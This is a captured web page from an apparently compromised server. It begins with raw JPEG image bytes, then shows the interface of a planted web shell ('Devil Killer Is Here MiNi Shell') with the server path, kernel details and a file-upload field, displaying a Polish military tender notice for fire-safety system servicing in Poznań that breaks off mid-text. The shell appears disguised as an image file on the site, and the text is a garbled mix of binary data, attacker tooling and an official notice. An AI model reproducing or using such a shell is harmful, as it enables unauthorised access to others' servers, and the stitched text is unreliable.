JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230627/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230627/0027760701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Serwisowanie urządzeń instalacji ppoż. w obiektach administrowanych przez 14 Wojskowy Oddział Gospodarczy w Poznaniu – 2023 r </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">14 Wojskowy Oddział Gospodarczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 302067654</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bukowska 34</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">60-811</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">14wog.zp@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.14wog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Serwisowanie urządzeń instalacji ppoż. w obiektach administrowanych przez 14 Wojskowy Oddział Gospodarczy w Poznaniu – 2023 r </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-42329bf7-14d0-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00277607</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00057920/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.15 Serwisowanie urządzeń instalacji ppoż. w obiektach administrowanych przez 14 Wojskowy Oddział Gospodarczy w Poznaniu – 2023 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/14wog <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia, komunikacja między Zamawiającym, a Wykonawcami odbywa się drogą elektroniczną za pośrednictwem platformy zakupowej dostępnej pod adresem:<br/>https://portal.smartpzp.pl/14wog<br/><br/>Użycie przez Wykonawcę do kontaktu z Zamawiającym środków komunikacji elektronicznej zapewnionych przez Platformę zakupową jest uzależnione od uprzedniej akceptacji przez Wykonawcę Regulaminu korzystania z usług Platformy zakupowej przy zakładaniu profilu Wykonawcy.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie niniejszego zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów i oświadczeń między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002r. o świadczeniu usług drogą elektroniczną.<br/>Ofertę, oświadczenia oraz inne dokumenty dotyczące niniejszego postępowania, w tym podmiotowe środki dowodowe Wykonawca przekazuje odpowiednio jako dokument elektroniczny bądź cyfrowe odwzorowanie dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym (dokument w formatach danych wymienionych w Rozporządzeniu Rady Ministrów z 12 kwietnia 2012r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych opatrzony kwalifikowanym podpisem elektronicznym).<br/>3. W postępowaniu o udzielenie zamówienia, komunikacja między Zamawiającym, a Wykonawcami odbywa się drogą elektroniczną za pośrednictwem platformy zakupowej dostępnej pod adresem:<br/>https://portal.smartpzp.pl/14wog<br/>Wykonawca zamierzający wziąć udział w postępowaniu zobowiązany jest posiadać konto na Platformie zakupowej. Zarejestrowanie i utrzymanie konta na Platformie zakupowej oraz korzystanie z platformy jest bezpłatne.<br/>W celu złożenia oferty przedstawiciel Wykonawcy zobowiązany jest założyć na Platformie zakupowej konto użytkownika, jednocześnie wprowadzając do systemu swój podmiot. Ten użytkownik będzie pełnić rolę administratora podmiotu Wykonawcy. Rejestracja na Platformie zakupowej dostępna jest po kliknięciu przycisku „Załóż konto”. Szczegółowa instrukcja dotycząca tworzenia konta Wykonawcy oraz złożenia oferty dostępna jest w zakładce E-learning. <br/>Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta w Systemie, ani logowania do Systemu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1)	administratorem Pani/Pana danych osobowych jest 14 Wojskowy Oddział Gospodarczy w Poznani u, ul. Bukowska 34, 60-811 Poznań, tel. 261 574 802;<br/>2)	inspektorem ochrony danych osobowych w 14 Wojskowym Oddziale Gospodarczym jest wyznaczony przez Komendanta inspektor ochrony danych osobowych tel. 261-577-445;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „Serwis urządzeń instalacji ppoż. w obiektach administrowanych przez 14 Wojskowy Oddział Gospodarczy w Poznaniu – 2023 r.”, nr sprawy 32/z/2023, prowadzonym zgodnie z art. 275 pkt. 1 ustawy;<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 19 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. ustawy; <br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy (w tym gwarancji) przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy; <br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9)	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>* * Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">32/z/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Serwisowanie urządzeń instalacji ppoż. w miejscowości Piła przy <br/> ul. Powstańców Wlkp. 180<br/>3.	Zakres prac będzie obejmował:<br/>1) Utrzymania w stałej sprawności technicznej przekazanych w konserwację<br/> i serwisowanie:<br/> a) instalacji sygnalizacji pożaru,<br/> b) stałych systemów i urządzeń gaśniczych,<br/> c) urządzeń wentylacji oddymiającej,<br/> d) klap i okien dymowych i klap przeciwpożarowych odcinających,<br/> e) dźwiękowych systemów ostrzegawczych,<br/> f) innych urządzeń pomocniczych współpracujących z instalacją wykrywania<br/> i alarmowania pożarowego w tym EBI (komunikacja).<br/> 2) Sprawdzenie stanu technicznego i konserwacja sygnalizatorów akustycznych <br/> i optycznych.<br/> 3) Sprawdzenie i konserwacja 100% elementów detekcyjnych w ciągu roku trwania<br/> umowy. (tj. ¼ czujek zamontowanych w instalacji w czasie każdego przeglądu<br/> kwartalnego), w tym czyszczenie komór dozorowych czujek.<br/>4) Sprawdzenie działania i konserwacja central, ich stanu technicznego <br/> i parametrów zgodnie z DTR.<br/>5) Sprawdzenie i konserwacja układu zasilania (dokręcenie i czyszczenie styków).<br/>6)Sprawdzenie wszystkich części i urządzeń systemów pod kątem ewentualnych<br/> zewnętrznych uszkodzeń (naprawa drobnych uszkodzeń).<br/>7) Sprawdzenie zamocowania wszystkich elementów (poprawa mocowania).<br/>8) Sprawdzenie i konserwacja Ręcznych Ostrzegaczy Pożarowych.<br/>9) Sprawdzenie wszystkich linii dozorowych poprzez losowo wybrane w każdej<br/> strefie sygnalizatory (czujka lub ostrzegacz pożarowy) pożaru za pomocą<br/> imitatora źródeł zasilania, w celu ustalenia czy centralka sygnalizacji pożaru (CSP) prawidłowo odbiera i wyświetla określone sygnały, emituje alarm akustyczny oraz uruchamia wszystkie urządzenia alarmowe i pomocnicze – przy każdym przeglądzie. <br/>10) Sprawdzenie stanu technicznego przewodów linii dozorowych i sygnałowych,<br/> sprawdzenie ciągłości linii, czyszczenie i dokręcenie styków.<br/>11) Sprawdzenie szczelności elementów (zachowanie IP elementów narażonych <br/> na szkodliwy wpływ czynników atmosferycznych i zalania na skutek awarii<br/> innych instalacji obiektowych).<br/>12) Sprawdzenie i konserwacja urządzeń przełączających.<br/>13) Sprawdzenie poprawności działania wszystkich czujek za pomocą imitatora <br/> dymu, temperatury itp. – co najmniej raz w roku.<br/>14) Sprawdzenie działania i konserwacja urządzeń zewnętrznych sygnalizacyjnych.<br/>15) Wymiana części o ograniczonej żywotności (np. diody, żarówki, bezpieczniki, <br/> szybki ochronne itp.).<br/>16) Usunięcie zauważonych uszkodzeń linii dozorowych, sygnałowych w czasie ich<br/> normalnej eksploatacji, uzupełnienia uchwytów, linek nośnych, poprawienie<br/> mocowań.<br/>17) Regulacja elementów systemu.<br/>18) Sprawdzenie historii alarmów centrali oraz wszystkich zapisów w książce<br/> eksploatacji oraz podejmowanie niezbędnych działań zmierzających <br/> do prawidłowej pracy instalacji.<br/>19) Sprawdzenie i konserwacja (czyszczenie, dokręcenie styków) elementów<br/> rezerwowych źródeł zasilania – pomiar pojemności akumulatorów <br/>20) Dokonywanie wpisów w książce pracy (konserwacji) instalacji <br/>o każdorazowym przeglądzie i wykonanych czynnościach oraz dokonywanych naprawach,<br/>21)Przeprowadzenie w trakcie I przeglądu testu funkcjonalnego poszczególnych systemów w zakresie prawidłowości działania (i współdziałania) urządzeń przeciwpożarowych, w celu ujawnienia ewentualnych rozbieżności pomiędzy ich faktycznym i zaplanowanym działaniem (zgodność z algorytmem sterowań). Testów należy dokonać w sposób nie powodujący: niepożądanych reakcji ludzi, uszkodzenia urządzeń przeciwpożarowych oraz strat finansowych.<br/>22)Sprawdzenie komunikacji pomiędzy centralami obiektowymi ppoż., a centralą główną w obiekcie Strażnicy Ppoż. i Lokalnego Centrum Nadzoru w systemie SECOLOG.<br/>23)Sprawdzenie komunikacji w pętlach głównych i podrzędnych.<br/>24)Sprawdzenie reakcji systemu na przerwy w pętlach.<br/>25)Sprawdzenie komunikacji pomiędzy centralami pożarowymi, a dialerami <br/> i konwerterami światłowodowymi.<br/>26)Sprawdzenie komunikacji i prawidłowości przesyłanych komunikatów przez centrale ppoż. do systemu monitoringu i zarządzania obiektu tzw. EBI (Enterprise Buildings Integrator). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50413200-5 - Usługi w zakresie napraw i konserwacji sprzętu gaśniczego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenia zamówienia z wolnej ręki o których mowa <br/>w art. 214 ust. 1 pkt. 7 ustawy o wartości 30% zamówienia podstawowego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta z najniższą ceną otrzyma max ilość punktów, pozostałe oferty oceniane będą <br/>wg wzoru: <br/> Najniższa cena brutto <br/> K1 = x 100 x 100 %<br/> Cena brutto oferty badanej <br/> <br/>Za najkorzystniejszą zostanie uznana oferta z najniższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Serwisowanie urządzeń instalacji ppoż. w miejscowości Biedrusko.<br/>3.	Zakres prac będzie obejmował:<br/>1) Utrzymania w stałej sprawności technicznej przekazanych w konserwację<br/> i serwisowanie:<br/> a) instalacji sygnalizacji pożaru,<br/> b) stałych systemów i urządzeń gaśniczych,<br/> c) urządzeń wentylacji oddymiającej,<br/> d) klap i okien dymowych i klap przeciwpożarowych odcinających,<br/> e) dźwiękowych systemów ostrzegawczych,<br/> f) innych urządzeń pomocniczych współpracujących z instalacją wykrywania<br/> i alarmowania pożarowego w tym EBI (komunikacja).<br/> 2) Sprawdzenie stanu technicznego i konserwacja sygnalizatorów akustycznych <br/> i optycznych.<br/> 3) Sprawdzenie i konserwacja 100% elementów detekcyjnych w ciągu roku trwania<br/> umowy. (tj. ¼ czujek zamontowanych w instalacji w czasie każdego przeglądu<br/> kwartalnego), w tym czyszczenie komór dozorowych czujek.<br/>4) Sprawdzenie działania i konserwacja central, ich stanu technicznego <br/> i parametrów zgodnie z DTR.<br/>5) Sprawdzenie i konserwacja układu zasilania (dokręcenie i czyszczenie styków).<br/>6)Sprawdzenie wszystkich części i urządzeń systemów pod kątem ewentualnych<br/> zewnętrznych uszkodzeń (naprawa drobnych uszkodzeń).<br/>7) Sprawdzenie zamocowania wszystkich elementów (poprawa mocowania).<br/>8) Sprawdzenie i konserwacja Ręcznych Ostrzegaczy Pożarowych.<br/>9) Sprawdzenie wszystkich linii dozorowych poprzez losowo wybrane w każdej<br/> strefie sygnalizatory (czujka lub ostrzegacz pożarowy) pożaru za pomocą<br/> imitatora źródeł zasilania, w celu ustalenia czy centralka sygnalizacji pożaru (CSP) prawidłowo odbiera i wyświetla określone sygnały, emituje alarm akustyczny oraz uruchamia wszystkie urządzenia alarmowe i pomocnicze – przy każdym przeglądzie. <br/>10) Sprawdzenie stanu technicznego przewodów linii dozorowych i sygnałowych,<br/> sprawdzenie ciągłości linii, czyszczenie i dokręcenie styków.<br/>11) Sprawdzenie szczelności elementów (zachowanie IP elementów narażonych <br/> na szkodliwy wpływ czynników atmosferycznych i zalania na skutek awarii<br/> innych instalacji obiektowych).<br/>12) Sprawdzenie i konserwacja urządzeń przełączających.<br/>13) Sprawdzenie poprawności działania wszystkich czujek za pomocą imitatora <br/> dymu, temperatury itp. – co najmniej raz w roku.<br/>14) Sprawdzenie działania i konserwacja urządzeń zewnętrznych sygnalizacyjnych.<br/>15) Wymiana części o ograniczonej żywotności (np. diody, żarówki, bezpieczniki, <br/> szybki ochronne itp.).<br/>16) Usunięcie zauważonych uszkodzeń linii dozorowych, sygnałowych w czasie ich<br/> normalnej eksploatacji, uzupełnienia uchwytów, linek nośnych, poprawienie<br/> mocowań.<br/>17) Regulacja elementów systemu.<br/>18) Sprawdzenie historii alarmów centrali oraz wszystkich zapisów w książce<br/> eksploatacji oraz podejmowanie niezbędnych działań zmierzających <br/> do prawidłowej pracy instalacji.<br/>19) Sprawdzenie i konserwacja (czyszczenie, dokręcenie styków) elementów<br/> rezerwowych źródeł zasilania – pomiar pojemności akumulatorów <br/>20) Dokonywanie wpisów w książce pracy (konserwacji) instalacji <br/>o każdorazowym przeglądzie i wykonanych czynnościach oraz dokonywanych naprawach,<br/>21)Przeprowadzenie w trakcie I przeglądu testu funkcjonalnego poszczególnych systemów w zakresie prawidłowości działania (i współdziałania) urządzeń przeciwpożarowych, w celu ujawnienia ewentualnych rozbieżności pomiędzy ich faktycznym i zaplanowanym działaniem (zgodność z algorytmem sterowań). Testów należy dokonać w sposób nie powodujący: niepożądanych reakcji ludzi, uszkodzenia urządzeń przeciwpożarowych oraz strat finansowych.<br/>22)Sprawdzenie komunikacji pomiędzy centralami obiektowymi ppoż., a centralą główną w obiekcie Strażnicy Ppoż. i Lokalnego Centrum Nadzoru w systemie SECOLOG.<br/>23)Sprawdzenie komunikacji w pętlach głównych i podrzędnych.<br/>24)Sprawdzenie reakcji systemu na przerwy w pętlach.<br/>25)Sprawdzenie komunikacji pomiędzy centralami pożarowymi, a dialerami <br/> i konwerterami światłowodowymi.<br/>26)Sprawdzenie komunikacji i prawidłowości przesyłanych komunikatów przez centrale ppoż. do systemu monitoringu i zarządzania obiektu tzw. EBI (Enterprise Buildings Integrator). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50413200-5 - Usługi w zakresie napraw i konserwacji sprzętu gaśniczego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu 